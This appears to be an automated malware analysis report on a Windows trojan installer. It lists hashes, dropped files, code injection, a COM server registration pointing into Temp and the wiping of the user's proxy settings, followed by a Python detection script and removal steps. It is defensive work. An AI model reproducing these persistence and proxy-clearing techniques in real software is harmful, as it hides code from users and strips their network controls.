Trojan.Generic.11944172 (B) (Emsisoft), Trojan.Generic.11944172 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: e024fb5336b77feb46b897cdcbb42bd4
SHA1: d53351936b8377c6a25856bad6329c73cfec4a0b
SHA256: 9eae7c704523ce71991724704bc029f49e82de8be7ba1fd43de72eadfe5aa7c4
SSDeep: 98304:BsPrm85pf4S709dSoEG7EC4T5d8tbB75RKg6EhZRu HYC:b8xcSoEgECO05zTaC
Size: 5122042 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1764
cpSetup.exe:260
The Trojan injects its code into the following process(es):
Setup__2140_il65.exe:1408
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process cpSetup.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (0 bytes)
The process Setup__2140_il65.exe:1408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)
Registry activity
The process %original file name%.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 34 9F 92 08 48 FF C4 82 27 05 E5 98 EB 9F 91"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process cpSetup.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 32 2B D7 B6 4F 61 2A 0B C8 33 1C 3E 03 10 E3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The Trojan sets the IE security-zone option that maps all sites bypassing the proxy server to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan sets the IE security-zone option that maps all UNC (network) paths to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan sets the IE security-zone option that maps all local (intranet) sites not listed in another zone to the Intranet Zone:
"IntranetName" = "1"
These three values are also the defaults IE writes when a profile's zone map is first initialised, so on their own they are weak evidence of tampering.
The process Setup__2140_il65.exe:1408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\TypeLib]
"(Default)" = "{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0]
"(Default)" = "InstallerLib"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il65.exe"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\VersionIndependentProgID]
"(Default)" = "carpel.groveled"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1463087278"
[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 18 1C 0C 4E A3 CF 5E 83 A6 05 CB 07 C9 14 AC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCR\carpel.groveled.1\CLSID]
"(Default)" = "{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"
[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\carpel.groveled\CurVer]
"(Default)" = "carpel.groveled.1"
[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"(Default)" = "{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}"
[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}]
"(Default)" = "IBoot"
[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\ProgID]
"(Default)" = "carpel.groveled.1"
[HKCR\carpel.groveled]
"(Default)" = "Inst Class"
[HKCR\carpel.groveled.1]
"(Default)" = "Inst Class"
The Trojan sets the IE security-zone option that maps all UNC (network) paths to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan sets the IE security-zone option that maps all sites bypassing the proxy server to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan sets the IE security-zone option that maps all local (intranet) sites not listed in another zone to the Intranet Zone:
"IntranetName" = "1"
(These are the same three IE default values already listed for cpSetup.exe:260.)
Proxy settings are disabled; together with the deletion of AutoConfigURL, ProxyServer and ProxyOverride below, this clears any user-configured proxy server or PAC URL for WinINet, so subsequent WinINet (IE) requests from this user profile go direct rather than through a configured proxy:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level"
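Most of the registry writes listed above are Windows housekeeping (the RNG seed, MountPoints2, Shell Folders, IE cache paths, ESENT event-log and EAP tracing keys) that any process touching WinINet or ESENT produces. The entries worth keying on are the COM registration whose LocalServer32 and ServerExecutable point at the Temp copy of Setup__2140_il65.exe (ProgID carpel.groveled, TypeLib InstallerLib, interface IBoot) and the removal of the user's proxy configuration. The following is example code added to this page, not Lavasoft's tooling: it parses a .reg-style export and applies exactly those two checks, while demonstrating that the ZoneMap values are only reported when they differ from IE's defaults. The export text is constructed from the values in the report; the user name and the oleaut32.dll control entry are assumptions.

```python
"""Scan a Windows .reg export for the two registry artefacts in this report
that actually matter: COM server registrations pointing into a user Temp
directory, and WinINet proxy configuration being cleared. Example code added
to this page, not Lavasoft's tooling. SAMPLE_REG is constructed from the
values the report lists (user name and the oleaut32 control entry are
assumptions); "=-" is the .reg syntax for a deleted value."""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}]
@="Inst Class"

[HKEY_CLASSES_ROOT\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
@="C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\Setup__2140_il65.exe"
"ServerExecutable"="C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\Setup__2140_il65.exe"

[HKEY_CLASSES_ROOT\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\ProgID]
@="carpel.groveled.1"

[HKEY_CLASSES_ROOT\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32]
@="C:\\WINDOWS\\system32\\oleaut32.dll"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000000
"AutoConfigURL"=-
"ProxyServer"=-
"ProxyOverride"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet"=dword:00000001
"IntranetName"=dword:00000001
"ProxyBypass"=dword:00000001
'''

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VAL_RE = re.compile(r'^(?:"(?P<name>[^"]*)"|(?P<default>@))=(?P<raw>.*)$')
DELETED = object()                      # sentinel for "name"=- lines
TEMP_DIR_RE = re.compile(r'\\Local Settings\\Temp\\|\\LOCALS~1\\Temp\\|\\AppData\\Local\\Temp\\', re.I)
COM_SERVER_SUBKEYS = ('localserver32', 'inprocserver32')
ZONEMAP_DEFAULTS = {'UNCAsIntranet': 1, 'IntranetName': 1, 'ProxyBypass': 1}


def parse_reg(text):
    """Return {key: {value_name: value}}. '' is the (Default) value,
    dword values become int, REG_SZ values are unescaped."""
    entries, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group('key')
            entries.setdefault(key, {})
            continue
        m = VAL_RE.match(line)
        if not m or key is None:
            continue                    # header, blank line or comment
        name = '' if m.group('default') else m.group('name')
        raw = m.group('raw')
        if raw == '-':
            entries[key][name] = DELETED
        elif raw.startswith('dword:'):
            entries[key][name] = int(raw[6:], 16)
        elif len(raw) >= 2 and raw[0] == raw[-1] == '"':
            entries[key][name] = raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        else:
            entries[key][name] = raw    # hex:/expand strings left as-is
    return entries


def com_servers_in_temp(entries):
    """COM servers whose executable lives in a user Temp directory: the
    registration survives even after the installer deletes the file."""
    hits = []
    for key, values in entries.items():
        if key.rsplit('\\', 1)[-1].lower() not in COM_SERVER_SUBKEYS:
            continue
        for name, value in values.items():
            if isinstance(value, str) and TEMP_DIR_RE.search(value):
                hits.append((key, name or '(Default)', value))
    return hits


def proxy_cleared(entries):
    """ProxyEnable forced to 0 while the proxy server / PAC URL is deleted."""
    for key, values in entries.items():
        if key.lower().endswith('\\internet settings') and values.get('ProxyEnable') == 0:
            if any(values.get(n) is DELETED for n in ('ProxyServer', 'AutoConfigURL')):
                return True
    return False


def zonemap_nondefault(entries):
    """The three ZoneMap flags the report highlights are also IE's defaults;
    only values that differ from the defaults are worth reporting."""
    out = []
    for key, values in entries.items():
        if key.lower().endswith('\\zonemap'):
            out += [(n, values[n]) for n, d in ZONEMAP_DEFAULTS.items()
                    if n in values and values[n] != d]
    return out


if __name__ == '__main__':
    reg = parse_reg(SAMPLE_REG)
    for hit in com_servers_in_temp(reg):
        print('COM server in Temp:', *hit)
    print('proxy configuration cleared:', proxy_cleared(reg))
    print('non-default ZoneMap values:', zonemap_nondefault(reg))
```

Run against a live export (`reg export HKCR\CLSID clsid.reg` and the HKCU Internet Settings key), the same three functions flag the sample's LocalServer32 and ServerExecutable values, report the proxy wipe, and stay silent on the ZoneMap defaults.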
Dropped PE files
MD5 | File path |
---|---|
fae6dcd512e610217f19251ab65624fd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup__2140_il65.exe |
a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\NSISdl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1764
cpSetup.exe:260
Setup__2140_il65.exe:1408
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)
(The desktop.ini entries under Temporary Internet Files are IE's own cache index files; deleting them is harmless, but they are not malicious in themselves.)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Remove the COM registration created by Setup__2140_il65.exe, whose LocalServer32 points at the dropped Temp copy: [HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}], [HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}], [HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}], [HKCR\carpel.groveled] and [HKCR\carpel.groveled.1].
- Restore the proxy settings the Trojan cleared under [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings] (ProxyEnable, ProxyServer, AutoConfigURL, ProxyOverride) if the machine is meant to use a proxy.
- Reboot the computer.
Static Analysis
VersionInfo
